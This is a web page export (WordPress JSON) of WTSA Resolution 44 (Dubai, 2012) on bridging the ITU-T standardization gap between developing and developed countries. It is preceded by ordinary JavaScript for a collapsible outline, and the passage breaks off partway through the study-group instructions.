{"id":313,"date":"2013-04-27T16:59:34","date_gmt":"2013-04-27T20:59:34","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=313"},"modified":"2015-06-30T00:30:48","modified_gmt":"2015-06-30T04:30:48","slug":"wtsa_44","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtsa\/wtsa-2012\/wtsa_44\/","title":{"rendered":"WTSA Resolution 44"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span>WTSA RESOLUTION 44 (Florian\u00f3polis, 2004; Johannesburg, 2008; Dubai, 2012)<\/span><\/h3>\n<h4><span>Bridging the standardization gap between developing 1 and developed countries<\/span><\/h4>\n<p><span>The World Telecommunication Standardization Assembly (Dubai, 2012),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\"><span>considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>a)  that Resolution 123 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference on bridging the standardization gap between developing and developed countries instructs the Secretary-General and the Directors of the three Bureaux to work closely with each other in pursuing initiatives that assist in bridging the standardization gap between developing and developed countries on follow-up and implementation of the operative paragraphs of this resolution supporting coordination in this respect at the regional level through regional offices and organizations;<\/span><\/li>\n<li class=\"basic\"><span>b)  that Resolution 139 (Guadalajara, 2010) of the Plenipotentiary Conference invites Member States to rapidly implement Resolution 37 (Rev. Hyderabad, 2010) of the World Telecommunication Development Conference on bridging the digital divide;<\/span><\/li>\n<li class=\"basic\"><span>c)  that Resolution 166 (Guadalajara, 2010) of the Plenipotentiary Conference on the number of vice-chairmen of sector advisory groups and other groups to promote more effective participation of developing countries;<\/span><\/li>\n<li class=\"basic\"><span>d)  that Resolution 169 (Guadalajara, 2010) of the Plenipotentiary Conference allowed admission of the academia, universities and their associated research establishments from the developing countries to participate in the work of the three sectors of the union for 1\/32 of the Sector Member contributory unit,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_675350075FM\" class=\"exp\"><span>recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>a)  that the tasks undertaken in the ITU Telecommunication Standardization Sector (ITU-T) cover Recommendations, conformity assessment and matters having policy or regulatory implications;<\/span><\/li>\n<li class=\"basic\"><span>b)  that the harmonious and balanced development of the worldwide telecommunication facilities and services is of mutual advantage to the developing as well as the developed countries;<\/span><\/li>\n<li class=\"basic\"><span>c)  that there is a need to reduce the cost of equipment and of rolling out of networks and facilities taking into account the needs and requirements of developing countries;<\/span><\/li>\n<li class=\"exp\"><span>d)  that the disparity between developing and developed countries in standardization has five components:<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>the disparity of voluntary standardization<\/span><\/li>\n<li class=\"basic\"><span>the disparity of mandatory technical regulations<\/span><\/li>\n<li class=\"basic\"><span>the disparity of conformity assessment<\/span><\/li>\n<li class=\"basic\"><span>disparity in human resources skilled in standardization, and<\/span><\/li>\n<li class=\"basic\"><span>the disparity in effective participation in ITU-T activities;<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\"><span>e) that it is of high importance for developing countries to increase their participation in the establishment of telecommunication standards;<\/span><\/li>\n<li class=\"basic\"><span>f)  that based on the findings of the ITU Study on Standardization Capability of developing countries, there is a need to improve coordination of information communication technologies (ICT) standardization activities in many developing countries to improve their contribution in ITU-T study groups, and that the establishment of national standardization secretariats could enhance both the standardization activities at national level and contribution in ITU-T study groups;<\/span><\/li>\n<li class=\"basic\"><span>g)  that the development of guidelines would enhance the participation of developing countries in ITU-T study groups,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_99286528FM\" class=\"exp\"><span>also recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>a)  that Decision 12 of the 2010 Plenipotentiary Conference confirmed free-of-charge on-line access for the general public to the ITU-T and ITU-R Recommendations, the ITU-R Reports, and the basic texts of the Union (Constitution, Agreement and General Regulations of the conferences, assemblies and other Union meetings), as well as the final minutes of the plenipotentiary conferences;<\/span><\/li>\n<li class=\"basic\"><span>b)  that annual reports presented at the ITU Council regarding policies of free on-line access to ITU publications indicate that said policies have been able to raise the level of awareness regarding standardization activities carried out at the ITU and to promote greater participation of developing countries in these activities;<\/span><\/li>\n<li class=\"basic\"><span>c)  that, under the strategic plan for the Union for 2012-2015, ITU-T is to work to &#8220;provide support and assistance to developing countries in bridging the standardization gap in relation with standardization matters, information and communication network infrastructure and applications, and relevant training materials for capacity building, taking into account the characteristics of the telecommunication environment of the developing countries&#8221;,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_1867671869FM\" class=\"exp\"><span>noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>a) that while ITU has made significant progress in defining and bridging the standardization gap,the developing countries are still encountering multifarious difficulties in ensuring their efficient participation in the work of ITU-T, in particular engaging in and following up the work of the ITU-T study groups;<\/span><\/li>\n<li class=\"basic\"><span>b) that the biennial budget structure now includes a separate expenditure line item for bridging standardization gap activities, while at the same time voluntary contributions are being encouraged, and a management mechanism for this fund has been implemented by the Telecommunication Standardization Bureau (TSB) in close coordination with the Telecommunication Development Bureau (BDT);<\/span><\/li>\n<li class=\"basic\"><span>c) the budgetary limitations, especially in developing country institutions, for attendance at ITU-T events of specific interest to them;<\/span><\/li>\n<li class=\"basic\"><span>d) that ITU&#8217;s programmes for fostering partnerships, under the patronage of ITU-T, continue to strengthen and expand the assistance ITU provides its members, particularly developing countries;<\/span><\/li>\n<li class=\"basic\"><span>e) the importance of having appropriate consultative frameworks for developing countries for the formulation and study of Questions, preparation of contributions and capacity building;<\/span><\/li>\n<li class=\"basic\"><span>f) that the organizational set-up and working methods of Study Groups 2, 3, 5 and 12 could serve to improve the level of developing country participation in standardization activities within some of the other study groups and contribute to achieving the objectives of Resolution 123 (Rev. Guadalajara, 2010);<\/span><\/li>\n<li class=\"basic\"><span>g) that joint meetings of regional groups of different ITU-T Study Groups, and in particular if concatenated with a regional workshop and\/or a meeting of a regional standardization body, will encourage participation of developing countries in these meetings and increase the effectiveness of such meetings;<\/span><\/li>\n<li class=\"basic\"><span>h) that the Telecommunication Standardization Advisory Group (TSAG) vice-chairmen, who are appointed on a regional representation basis, as well as study group vice-chairmen from developing countries, can be charged with specific responsibility, which can further enhance more active participation of, especially, developing countries in the standardization work of ITU T;<\/span><\/li>\n<li class=\"basic\"><span>i) that ITU can further improve both the quality and quantity of participation in standardization from developing countries through vice chairmen\u2019s and chairmen\u2019s role in mobilizing participation from their regions,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_1921151812FM\" class=\"exp\"><span>taking into account<\/span>\n<ul class=\"sub\">\n<li id=\"FMFreemind_Link_1864912386FM\" class=\"basic\"><span>a)  the relevant conclusions of the Global Standardization Symposium;<\/span><\/li>\n<li id=\"FMFreemind_Link_124576279FM\" class=\"basic\"><span>b)  that the actual participation by developing countries, where it exists, is usually limited to the final approval and implementation stages, rather than in the preparation of proposals prepared in the various working groups;<\/span><\/li>\n<li id=\"FMFreemind_Link_281222284FM\" class=\"basic\"><span>c)  that coordination at a national level in many developing countries to handle ICT standardization activities in order to contribute to work in ITU-T needs to be improved;<\/span><\/li>\n<li class=\"basic\"><span>d)  TSAG agreed to create a mentor role in ITU-T study groups to coordinate with representatives from developed and developing countries with the objective of sharing information and best practices with regard to the application of ITU-T Recommendations to enhance the standardization activities in developing countries and in the regional groups,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_1276796659FM\" class=\"exp\"><span>recalls<\/span>\n<ul class=\"sub\">\n<li id=\"FMFreemind_Link_412403301FM\" class=\"basic\"><span>that Resolution 1353 of the ITU Council recognizes that telecommunications and ICT are essential components for developed and developing countries to achieve sustainable development, and instructs the Secretary-General, in collaboration with the Directors of the Bureaux, to identify new activities to be undertaken by ITU to support the developing countries to achieve sustainable development through telecommunications and ICT,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_35128101FM\" class=\"exp\"><span>resolves<\/span>\n<ul class=\"sub\">\n<li id=\"FMFreemind_Link_1374302697FM\" class=\"basic\"><span>1  that the action plan annexed to this resolution having the objective of bridging the standardization gap between developed and developing countries, should be continued and reviewed on an annual basis to take into account the requirements of developing countries;<\/span><\/li>\n<li class=\"col\"><span>2  that ITU-T, in collaboration with the other Sectors as appropriate, shall develop a programme to:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>i)  assist developing countries in developing methods that facilitate the process of linking innovations to the standardization process;<\/span><\/li>\n<li class=\"basic\"><span>ii)  assist developing countries in developing means to align their industrial and innovation national strategies towards the goal of achieving highest impact on their socio-economic ecosystems;<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\"><span>3  to request the Director of TSB to strengthen cooperation and coordination with the relevant regional organizations, in particular those of the developing countries;<\/span><\/li>\n<li id=\"FMFreemind_Link_124431436FM\" class=\"basic\"><span>4  that, subject to Council approval, there should be free on-line access to the manuals, handbooks, directives and other ITU material related to understanding and implementation of ITU-T Recommendations particularly in the area of planning, exploitation and maintenance of telecommunications networks;<\/span><\/li>\n<li class=\"basic\"><span>5  to support, within available or otherwise contributed resources, and on a case-by-case basis, the coordinated creation of regional groups of ITU-T study groups, and encourage cooperation and collaboration of these groups with other regional standardization entities;<\/span><\/li>\n<li class=\"basic\"><span>6  to maintain in the annual budget of the Union a separate expenditure line item for bridging the standardization gap activities, while at the same time voluntary contributions should be further encouraged;<\/span><\/li>\n<li id=\"FMFreemind_Link_1793182752FM\" class=\"col\"><span>7  that all vice-chairmen and chairmen from developing countries appointed to the leadership positions in TSAG and ITU-T study groups include the following responsibilities among others from developing countries be charged with the responsibility to:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\"><span>i)  closely work with ITU members in the region in order to mobilize them to participate in the ITU standardization activities to assist in bridging the standardization gap;<\/span><\/li>\n<li id=\"FMFreemind_Link_177659600FM\" class=\"basic\"><span>ii)  make mobilization and participation reports to the ITU body concerning the region;<\/span><\/li>\n<li id=\"FMFreemind_Link_382472720FM\" class=\"basic\"><span>iii)  prepare and submit a mobilization programme for the regions that they represent at the first meeting of TSAG or a study group and send a report to TSAG,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_1618612228FM\" class=\"exp\"><span>further resolves that ITU regional offices<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>1  be engaged in the activities of TSB in order to promote and coordinate standardization activities in the region to support the implementation of the relevant parts of this Resolution and to carry out the objectives of the action plan, and to launch campaigns to attract new Sector Members, Associates and Academia from developing countries to join the ITU-T;<\/span><\/li>\n<li class=\"basic\"><span>2  assist the vice-chairmen, within the offices&#8217; budgets, to mobilize members within their respective regions for increased standardization participation,<\/span><\/li>\n<li class=\"basic\"><span>3  organize and coordinate the activities of the regional groups of ITU-T study groups ;<\/span><\/li>\n<li class=\"basic\"><span>4  provide the necessary assistance to the regional groups of ITU-T study groups;<\/span><\/li>\n<li class=\"basic\"><span>5  provide assistance to the regional telecommunication organizations for the setting up and management of regional standardization bodies,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_1929156892FM\" class=\"exp\"><span>invites the Council<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>1  to increase the ITU-T budgetary provisions for fellowships, interpretation and translation of documents for TSAG, ITU-T study groups and regional study group meetings;<\/span><\/li>\n<li id=\"FMFreemind_Link_1875309152FM\" class=\"basic\"><span>2  to encourage the establishment of a specialised panel for stimulating ICT innovations, under ITU-T, with the objective of enhancing  global collaborative innovation  to bridge the standardization gap between developed and developing countries and to identify and support innovations from developing countries;<\/span><\/li>\n<li class=\"basic\"><span>3  to report as appropriate on this matter to the 2014 Plenipotentiary Conference;<\/span><\/li>\n<li class=\"basic\"><span>4  to advise the 2014 Plenipotentiary Conferenceon its implementation of invites the Council;<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_434744334FM\" class=\"exp\"><span>instructs the Director of the Telecommunication Standardization Bureau, in collaboration with the Directors of Telecommunication Development Bureau and the Radiocommunication Bureau, within available resources,<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>1 to continue implementing the objectives of the action plan annexed to this resolution;<\/span><\/li>\n<li id=\"FMFreemind_Link_1317273441FM\" class=\"basic\"><span>2 to assist developing countries with their studies, particularly in respect of their priority questions and towards developing and implementing ITU-T Recommendations;<\/span><\/li>\n<li id=\"FMFreemind_Link_260957673FM\" class=\"basic\"><span>3 to continue the activities of the implementation group established within the TSB to organize, mobilize resources, coordinate efforts and monitor work related to this Resolution and its action plan;<\/span><\/li>\n<li class=\"basic\"><span>4  to take the appropriate actions for each new ITU-T Recommendation having implementation aspects, and to consider the need for developing implementation guidelines;<\/span><\/li>\n<li id=\"FMFreemind_Link_1382466215FM\" class=\"basic\"><span>5  to arrange for the drafting of a set of guidelines on the application of ITU Recommendations at national level, having regard to the provisions of Resolution 168 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference;<\/span><\/li>\n<li class=\"basic\"><span>6  to avail the support needed for regional mobilization for standardization;<\/span><\/li>\n<li id=\"FMFreemind_Link_838040796FM\" class=\"basic\"><span>7  to carry out the necessary studies on the role of innovation management and innovation stimulation programmes on bridging the standardization gap between the developed and developing countries;<\/span><\/li>\n<li class=\"basic\"><span>8  to include in the TSB budget proposal to the ITU Council funds identified for the implementation of this resolution by taking into account financial constraints and existing and planned BDT activities;<\/span><\/li>\n<li id=\"FMFreemind_Link_799543960FM\" class=\"basic\"><span>9  to assist in institutionalizing the terms of reference (ToR), specified in resolves item 8 in the working of TSAG and ITU T study groups, to ensure that the specific ToR are made known to aspiring vice-chairmen before their appointment;<\/span><\/li>\n<li id=\"FMFreemind_Link_1752910787FM\" class=\"basic\"><span>10  to report on the implementation of this plan to future WTSAs and Plenipotentiary Conferences, with a view to reviewing this resolution and introducing the appropriate amendments in the light of implementation outcome, as well as the budgetary adjustments needed to implement this resolution;<\/span><\/li>\n<li id=\"FMFreemind_Link_1845259774FM\" class=\"basic\"><span>11  to provide assistance, if requested, to developing countries to develop guidelines for use by the national entities of the requesting country in order to enhance their participation in ITU-T study groups, with the assistance of the ITU regional offices for bridging the standardization gap;<\/span><\/li>\n<li class=\"basic\"><span>12  to enhance use of electronic channels such as webinars or e-learning for education and training on implementation of ITU-T Recommendations;<\/span><\/li>\n<li class=\"basic\"><span>13  to provide all necessary support for creating and ensuring the smooth functioning of the regional groups;<\/span><\/li>\n<li class=\"basic\"><span>14  to take all necessary measures to facilitate the organization of meetings and workshops of regional groups;<\/span><\/li>\n<li id=\"FMFreemind_Link_1549500238FM\" class=\"basic\"><span>15  to report on the effectiveness of regional groups to the ITU Council;<\/span><\/li>\n<li id=\"FMFreemind_Link_182087727FM\" class=\"basic\"><span>16  to conduct, as appropriate, workshops and seminars to disseminate information and increase understanding of new Recommendations, in particular for developing countries,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_1185247661FM\" class=\"exp\"><span>instructs study groups and the Telecommunication Standardization Advisory Group<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>1  to be actively involved in the implementation of the programmes set forth in the action plan annexed to this resolution;<\/span><\/li>\n<li class=\"basic\"><span>2  to coordinate joint meetings of ITU-T Study Groups\u2019 regional groups,<\/span><\/li>\n<\/ul>\n<\/li>\n<li id=\"FMFreemind_Link_134484782FM\" class=\"exp\"><span>further instructs the study groups<\/span>\n<ul class=\"sub\">\n<li class=\"basic\"><span>1  to take account of the specific characteristics of the telecommunication environment of the developing countries in the process of establishing standards in the fields of planning, services, systems, operation, tariffs and maintenance, and to provide solutions\/options relevant to developing countries wherever possible;<\/span><\/li>\n<li class=\"basic\"><span>2  to take appropriate steps to have studies carried out on questions connected with standardization which are identified by World Telecommunication Development Conferences;<\/span><\/li>\n<li class=\"basic\"><span>3  to continue liaising with study groups of the ITU Telecommunication Development Sector, where appropriate, when developing new or revised ITU-T 